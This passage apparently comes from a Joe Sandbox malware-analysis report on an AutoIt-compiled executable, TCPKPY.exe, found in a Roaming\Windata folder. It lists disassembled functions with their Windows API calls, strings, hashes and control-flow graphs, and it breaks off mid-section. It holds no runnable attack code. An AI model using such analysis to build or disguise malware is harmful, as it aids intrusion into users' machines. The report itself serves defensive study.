                                                                                                                • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                • String ID: SCRIPT
                                                                                                                • API String ID: 3051347437-3967369404
                                                                                                                • Opcode ID: dea5c1d66852d0dabe4b44e4105960930656fe6db9d3a72604eb8207fba0a91c
                                                                                                                • Instruction ID: 59deee8cc9f34f3eb92229ea1c47618e894a2876ba11bd9c9407039c1f09b1d5
                                                                                                                • Opcode Fuzzy Hash: dea5c1d66852d0dabe4b44e4105960930656fe6db9d3a72604eb8207fba0a91c
                                                                                                                • Instruction Fuzzy Hash: 67115A74210701BFE7219B65EC48F27BBBDEBC9B51F108028B80286191DB71DD158A60
                                                                                                                Function 0020DCD0 Relevance: 3.5, APIs: 2, Instructions: 540COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 07d2a0ab6b1590da5ad7f21ccabdc005ccd4f2cff060c79a76122a901c8cac75
                                                                                                                • Instruction ID: 846a1fab29e1b875f56c78dd3929f142fb7a8da108a967bace7bb56136cced6b
                                                                                                                • Opcode Fuzzy Hash: 07d2a0ab6b1590da5ad7f21ccabdc005ccd4f2cff060c79a76122a901c8cac75
                                                                                                                • Instruction Fuzzy Hash: 5E22B071921206DFDB24DF98C484AAAF7F1FF18300F14C469E85A9B392D770ADA5CB91
                                                                                                                Function 0020E1F0 Relevance: 49.8, APIs: 24, Strings: 4, Instructions: 815windowsleeptimeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0020E279
                                                                                                                • timeGetTime.WINMM ref: 0020E51A
                                                                                                                • TranslateMessage.USER32(?), ref: 0020E646
                                                                                                                • DispatchMessageW.USER32(?), ref: 0020E651
                                                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0020E664
                                                                                                                • LockWindowUpdate.USER32(00000000), ref: 0020E697
                                                                                                                • DestroyWindow.USER32 ref: 0020E6A3
                                                                                                                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0020E6BD
                                                                                                                • Sleep.KERNEL32(0000000A), ref: 00275B15
                                                                                                                • TranslateMessage.USER32(?), ref: 002762AF
                                                                                                                • DispatchMessageW.USER32(?), ref: 002762BD
                                                                                                                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 002762D1
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                                                                                                                • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                                                                                • API String ID: 2641332412-570651680
                                                                                                                • Opcode ID: 99874d3327183c5ad064173bf0ccd773253d7a1890c81f876996a8be7ef0c7ed
                                                                                                                • Instruction ID: 80a62d0b953b1b877cde8e8ddef323e15a30386b624962862e17f6faecb4eff0
                                                                                                                • Opcode Fuzzy Hash: 99874d3327183c5ad064173bf0ccd773253d7a1890c81f876996a8be7ef0c7ed
                                                                                                                • Instruction Fuzzy Hash: 5B62D1705283419FEB24DF24D899BAA77E4BF45304F04496DF9498B2D3DBB0D8A8CB52
                                                                                                                Function 00236A28 Relevance: 49.6, APIs: 26, Strings: 2, Instructions: 626fileCOMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • ___createFile.LIBCMT ref: 00236C73
                                                                                                                • ___createFile.LIBCMT ref: 00236CB4
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00236CDD
                                                                                                                • __dosmaperr.LIBCMT ref: 00236CE4
                                                                                                                • GetFileType.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00236CF7
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00236D1A
                                                                                                                • __dosmaperr.LIBCMT ref: 00236D23
                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00236D2C
                                                                                                                • __set_osfhnd.LIBCMT ref: 00236D5C
                                                                                                                • __lseeki64_nolock.LIBCMT ref: 00236DC6
                                                                                                                • __close_nolock.LIBCMT ref: 00236DEC
                                                                                                                • __chsize_nolock.LIBCMT ref: 00236E1C
                                                                                                                • __lseeki64_nolock.LIBCMT ref: 00236E2E
                                                                                                                • __lseeki64_nolock.LIBCMT ref: 00236F26
                                                                                                                • __lseeki64_nolock.LIBCMT ref: 00236F3B
                                                                                                                • __close_nolock.LIBCMT ref: 00236F9B
                                                                                                                  • Part of subcall function 0022F84C: CloseHandle.KERNEL32(00000000,002AEEC4,00000000,?,00236DF1,002AEEC4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0022F89C
                                                                                                                  • Part of subcall function 0022F84C: GetLastError.KERNEL32(?,00236DF1,002AEEC4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0022F8A6
                                                                                                                  • Part of subcall function 0022F84C: __free_osfhnd.LIBCMT ref: 0022F8B3
                                                                                                                  • Part of subcall function 0022F84C: __dosmaperr.LIBCMT ref: 0022F8D5
                                                                                                                  • Part of subcall function 0022889E: __getptd_noexit.LIBCMT ref: 0022889E
                                                                                                                • __lseeki64_nolock.LIBCMT ref: 00236FBD
                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 002370F2
                                                                                                                • ___createFile.LIBCMT ref: 00237111
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0023711E
                                                                                                                • __dosmaperr.LIBCMT ref: 00237125
                                                                                                                • __free_osfhnd.LIBCMT ref: 00237145
                                                                                                                • __invoke_watson.LIBCMT ref: 00237173
                                                                                                                • __wsopen_helper.LIBCMT ref: 0023718D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                                                                                                                • String ID: 9A"$@
                                                                                                                • API String ID: 3896587723-4115013642
                                                                                                                • Opcode ID: 1cb60079d9f97d8761abaae17a47611e2ccfd7cb1a6975ea2cc095a2ae1f451c
                                                                                                                • Instruction ID: 0ada4b6ae17ae0aac16f07d686a3e08749cbdc34d127e2c4dd08f1226e20b5f6
                                                                                                                • Opcode Fuzzy Hash: 1cb60079d9f97d8761abaae17a47611e2ccfd7cb1a6975ea2cc095a2ae1f451c
                                                                                                                • Instruction Fuzzy Hash: 342259F192410AABEF258FA8DC59BAD7B69EF00324F248229E511E72D1C7758D70CB51
                                                                                                                Function 00201F04 Relevance: 30.1, APIs: 8, Strings: 9, Instructions: 346COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 546 201f04-201f9c call 202d1a * 2 call 20c935 * 2 call 207e53 call 20d3d2 * 3 563 201fa2-201fa6 546->563 564 272569-272575 call 222626 546->564 566 27257d-272583 call 23e4ea 563->566 567 201fac-201faf 563->567 564->566 571 27258f-27259b call 20a4f6 566->571 570 201fb5-201fb8 567->570 567->571 570->571 574 201fbe-201fe3 GetForegroundWindow call 20200a call 20197e 570->574 578 2725a1-2725b1 call 20a4f6 571->578 579 272899-27289d 571->579 589 201fe4-202007 call 205cd3 * 3 574->589 578->579 592 2725b7-2725c5 578->592 581 27289f-2728a6 call 20c935 579->581 582 2728ab-2728ae 579->582 581->582 586 2728b7-2728c4 582->586 587 2728b0 582->587 590 2728d6-2728da 586->590 591 2728c6-2728d4 call 20b8a7 CharUpperBuffW 586->591 587->586 596 2728f1-2728fa 590->596 597 2728dc-2728df 590->597 591->590 595 2725c9-2725e1 call 23d68d 592->595 595->579 611 2725e7-2725f7 call 21f885 595->611 598 2728fc-272909 GetDesktopWindow EnumChildWindows 596->598 599 27290b EnumWindows 596->599 597->596 603 2728e1-2728ef call 20b8a7 CharUpperBuffW 597->603 604 272911-272930 call 23e44e call 202d1a 598->604 599->604 603->596 622 272932-27293b call 20200a 604->622 623 272940 604->623 618 2725fd-27260d call 21f885 611->618 619 27287b-27288b call 21f885 611->619 630 272613-272623 call 21f885 618->630 631 272861-272871 call 21f885 618->631 628 272873-272876 619->628 629 27288d-272891 619->629 622->623 629->589 632 272897 629->632 638 27281d-272836 call 2488a2 IsWindow 630->638 639 272629-272639 call 21f885 630->639 631->628 640 272842-272848 GetForegroundWindow 631->640 635 272852-272858 632->635 635->631 638->589 647 27283c-272840 638->647 649 27263b-272640 639->649 650 272659-272669 call 21f885 639->650 642 272849-272850 call 20200a 640->642 642->635 647->642 651 272646-272657 call 205cf6 649->651 652 27280d-27280f 649->652 657 27266b-272675 650->657 658 27267a-27268a call 21f885 650->658 662 27269b-2726a7 call 205be9 651->662 655 272817-272818 652->655 655->589 660 2727e6-2727f0 call 20c935 657->660 666 2726b5-2726c5 call 21f885 658->666 667 27268c-272698 call 205cf6 658->667 671 272804-272808 660->671 672 272811-272813 662->672 673 2726ad-2726b0 662->673 677 2726c7-2726de call 222241 666->677 678 2726e3-2726f3 call 21f885 666->678 667->662 671->595 672->655 673->671 677->671 683 2726f5-27270c call 222241 678->683 684 272711-272721 call 21f885 678->684 683->671 689 272723-27273a call 222241 684->689 690 27273f-27274f call 21f885 684->690 689->671 695 272751-272768 call 222241 690->695 696 27276d-27277d call 21f885 690->696 695->671 701 272795-2727a5 call 21f885 696->701 702 27277f-272793 call 222241 696->702 707 2727a7-2727b7 call 21f885 701->707 708 2727c3-2727d3 call 21f885 701->708 702->671 707->628 715 2727bd-2727c1 707->715 713 2727d5-2727da 708->713 714 2727f2-272802 call 23d614 708->714 716 272815 713->716 717 2727dc-2727e2 713->717 714->628 714->671 715->671 716->655 717->660
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00207E53: _memmove.LIBCMT ref: 00207EB9
                                                                                                                • GetForegroundWindow.USER32 ref: 00201FBE
                                                                                                                • IsWindow.USER32(?), ref: 0027282E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Foreground_memmove
                                                                                                                • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                                                                                • API String ID: 3828923867-1919597938
                                                                                                                • Opcode ID: f5d47399415cd5c6638f91a57e4bfda8d5adb766fe6e6f439315c5d75f599203
                                                                                                                • Instruction ID: 33b20fa1f790bd1b2f78d6ebb67fd0ceb46b00160fdeed17aae4e5e7dc73f9a4
                                                                                                                • Opcode Fuzzy Hash: f5d47399415cd5c6638f91a57e4bfda8d5adb766fe6e6f439315c5d75f599203
                                                                                                                • Instruction Fuzzy Hash: C9D1EA30124703DBCB08EF14C581AAABBA5BF54344F148A2DF459575A2DB31E9BDCFA2
                                                                                                                Function 00204257 Relevance: 19.5, APIs: 4, Strings: 7, Instructions: 235COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe,00000104,?,00000000,00000001,00000000), ref: 0020428C
                                                                                                                  • Part of subcall function 0020CAEE: _memmove.LIBCMT ref: 0020CB2F
                                                                                                                  • Part of subcall function 00221BC7: __wcsicmp_l.LIBCMT ref: 00221C50
                                                                                                                • _wcscpy.LIBCMT ref: 002043C0
                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe,00000104,?,?,?,?,00000000,CMDLINE,?,?,00000100,00000000,CMDLINE,?,?), ref: 0027214E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileModuleName$__wcsicmp_l_memmove_wcscpy
                                                                                                                • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe$CMDLINE$CMDLINERAW
                                                                                                                • API String ID: 861526374-4203412346
                                                                                                                • Opcode ID: 19a092e40f053153e04758b2a73d910d7743e333fb62703ec14ea75dbe78e986
                                                                                                                • Instruction ID: 6e2748c40ded017134dc9702add6e74459fa98d6e4dc4fc4329819bde511c215
                                                                                                                • Opcode Fuzzy Hash: 19a092e40f053153e04758b2a73d910d7743e333fb62703ec14ea75dbe78e986
                                                                                                                • Instruction Fuzzy Hash: 308184B2920219AACB05EBE0DD52EEF77B8AF15350F604015F645B70C3EB706A68CF61
                                                                                                                Function 0021E975 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 170COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0021EA39
                                                                                                                • __wsplitpath.LIBCMT ref: 0021EA56
                                                                                                                  • Part of subcall function 0022297D: __wsplitpath_helper.LIBCMT ref: 002229BD
                                                                                                                • _wcsncat.LIBCMT ref: 0021EA69
                                                                                                                • __makepath.LIBCMT ref: 0021EA85
                                                                                                                  • Part of subcall function 00222BFF: __wmakepath_s.LIBCMT ref: 00222C13
                                                                                                                  • Part of subcall function 0022010A: std::exception::exception.LIBCMT ref: 0022013E
                                                                                                                  • Part of subcall function 0022010A: __CxxThrowException@8.LIBCMT ref: 00220153
                                                                                                                • _wcscpy.LIBCMT ref: 0021EABE
                                                                                                                  • Part of subcall function 0021EB05: RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,00000000,?,0021EADA,?,?), ref: 0021EB27
                                                                                                                • _wcscat.LIBCMT ref: 002732FC
                                                                                                                • _wcscat.LIBCMT ref: 00273334
                                                                                                                • _wcsncpy.LIBCMT ref: 00273370
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _wcscat$Exception@8FileModuleNameOpenThrow__makepath__wmakepath_s__wsplitpath__wsplitpath_helper_wcscpy_wcsncat_wcsncpystd::exception::exception
                                                                                                                • String ID: Include$\$",
                                                                                                                • API String ID: 1213536620-1107123480
                                                                                                                • Opcode ID: d2c0d933a4d46bcd5aca77bfe2cf3d20042bf61b1390fc33a88c204f299346f0
                                                                                                                • Instruction ID: 5da25e066c92ae36bfedc29e2b04b04010e556f2f63b069103945f0ade69b738
                                                                                                                • Opcode Fuzzy Hash: d2c0d933a4d46bcd5aca77bfe2cf3d20042bf61b1390fc33a88c204f299346f0
                                                                                                                • Instruction Fuzzy Hash: AF515FB1414380EBC315EF94FC89C96B7E8FB59300B80495EF949932A2EF749658CF66
                                                                                                                Function 00202F58 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53windowregistryCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • GetSysColorBrush.USER32(0000000F), ref: 00202F8B
                                                                                                                • RegisterClassExW.USER32(00000030), ref: 00202FB5
                                                                                                                • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00202FC6
                                                                                                                • InitCommonControlsEx.COMCTL32(?), ref: 00202FE3
                                                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00202FF3
                                                                                                                • LoadIconW.USER32(000000A9), ref: 00203009
                                                                                                                • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00203018
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                • API String ID: 2914291525-1005189915
                                                                                                                • Opcode ID: 6969bccaafa9d84d34a13d575d6e8c2f49d08343bbd38c649cdae70d28dab7da
                                                                                                                • Instruction ID: 773c0f7ac633ba502d615a3a7ed6865bb5e395e21f6d2661f666e2886bdb61a8
                                                                                                                • Opcode Fuzzy Hash: 6969bccaafa9d84d34a13d575d6e8c2f49d08343bbd38c649cdae70d28dab7da
                                                                                                                • Instruction Fuzzy Hash: 5421B2B9905318AFEB009FA4F84EBCDBBF4FB09700F10421AF615A62A0D7B14568CF91
                                                                                                                Function 002029C2 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151windowtimeregistryCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 922 2029c2-2029e2 924 202a42-202a44 922->924 925 2029e4-2029e7 922->925 924->925 928 202a46 924->928 926 202a48 925->926 927 2029e9-2029f0 925->927 932 272307-272335 call 20322e call 21ec33 926->932 933 202a4e-202a51 926->933 929 2029f6-2029fb 927->929 930 202aac-202ab4 PostQuitMessage 927->930 931 202a2b-202a33 DefWindowProcW 928->931 935 202a01-202a03 929->935 936 27238f-2723a3 call 2457fb 929->936 937 202a72-202a74 930->937 938 202a39-202a3f 931->938 967 27233a-272341 932->967 939 202a53-202a54 933->939 940 202a76-202a9d SetTimer RegisterWindowMessageW 933->940 942 202ab6-202ac5 call 201e58 935->942 943 202a09-202a0e 935->943 936->937 961 2723a9 936->961 937->938 946 202a5a-202a6d KillTimer call 202b94 call 202ac7 939->946 947 2722aa-2722ad 939->947 940->937 944 202a9f-202aaa CreatePopupMenu 940->944 942->937 949 272374-27237b 943->949 950 202a14-202a19 943->950 944->937 946->937 953 2722e3-272302 MoveWindow 947->953 954 2722af-2722b1 947->954 949->931 957 272381-27238a call 23b31f 949->957 959 27235f-27236f call 245fdb 950->959 960 202a1f-202a25 950->960 953->937 963 2722b3-2722b6 954->963 964 2722d2-2722de SetFocus 954->964 957->931 959->937 960->931 960->967 961->931 963->960 968 2722bc-2722cd call 20322e 963->968 964->937 967->931 971 272347-27235a call 202b94 call 203598 967->971 968->937 971->931
                                                                                                                APIs
                                                                                                                • DefWindowProcW.USER32(?,?,?,?), ref: 00202A33
                                                                                                                • KillTimer.USER32(?,00000001), ref: 00202A5D
                                                                                                                • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00202A80
                                                                                                                • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00202A8B
                                                                                                                • CreatePopupMenu.USER32 ref: 00202A9F
                                                                                                                • PostQuitMessage.USER32(00000000), ref: 00202AAE
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                • String ID: TaskbarCreated
                                                                                                                • API String ID: 129472671-2362178303
                                                                                                                • Opcode ID: efc08e14f6b4b0652affedb3aa23506da6c681ff1f41f79f61926e98ff1479a9
                                                                                                                • Instruction ID: 9305b65d1830c0fb2102cf9cfa7cc500172978d437300f4440067e08a46eacba
                                                                                                                • Opcode Fuzzy Hash: efc08e14f6b4b0652affedb3aa23506da6c681ff1f41f79f61926e98ff1479a9
                                                                                                                • Instruction Fuzzy Hash: 0841CF3123434ADBDB24AF68AC1EF793759AB15300F144216FD06921E3EEB4987C8765
                                                                                                                Function 002030A5 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66windowregistryCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • GetSysColorBrush.USER32(0000000F), ref: 002030B0
                                                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 002030BF
                                                                                                                • LoadIconW.USER32(00000063), ref: 002030D5
                                                                                                                • LoadIconW.USER32(000000A4), ref: 002030E7
                                                                                                                • LoadIconW.USER32(000000A2), ref: 002030F9
                                                                                                                  • Part of subcall function 0020318A: LoadImageW.USER32(00200000,00000063,00000001,00000010,00000010,00000000), ref: 002031AE
                                                                                                                • RegisterClassExW.USER32(?), ref: 00203167
                                                                                                                  • Part of subcall function 00202F58: GetSysColorBrush.USER32(0000000F), ref: 00202F8B
                                                                                                                  • Part of subcall function 00202F58: RegisterClassExW.USER32(00000030), ref: 00202FB5
                                                                                                                  • Part of subcall function 00202F58: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00202FC6
                                                                                                                  • Part of subcall function 00202F58: InitCommonControlsEx.COMCTL32(?), ref: 00202FE3
                                                                                                                  • Part of subcall function 00202F58: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00202FF3
                                                                                                                  • Part of subcall function 00202F58: LoadIconW.USER32(000000A9), ref: 00203009
                                                                                                                  • Part of subcall function 00202F58: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00203018
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                • String ID: #$0$AutoIt v3
                                                                                                                • API String ID: 423443420-4155596026
                                                                                                                • Opcode ID: 54af4179c0b0bf04686f56b4168b26ba0839baf163de9cd76ee71901c8bbae04
                                                                                                                • Instruction ID: fb61da42bf8e6592707123babd6c5992b37b1e900c221501fbf626d57dc81dde
                                                                                                                • Opcode Fuzzy Hash: 54af4179c0b0bf04686f56b4168b26ba0839baf163de9cd76ee71901c8bbae04
                                                                                                                • Instruction Fuzzy Hash: AC213CB4D10304AFDB00DFA9FC4EE99BBF5FB49310F14412AE618A22A2D7B545648F91
                                                                                                                Function 0022BA66 Relevance: 15.2, APIs: 10, Instructions: 219COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
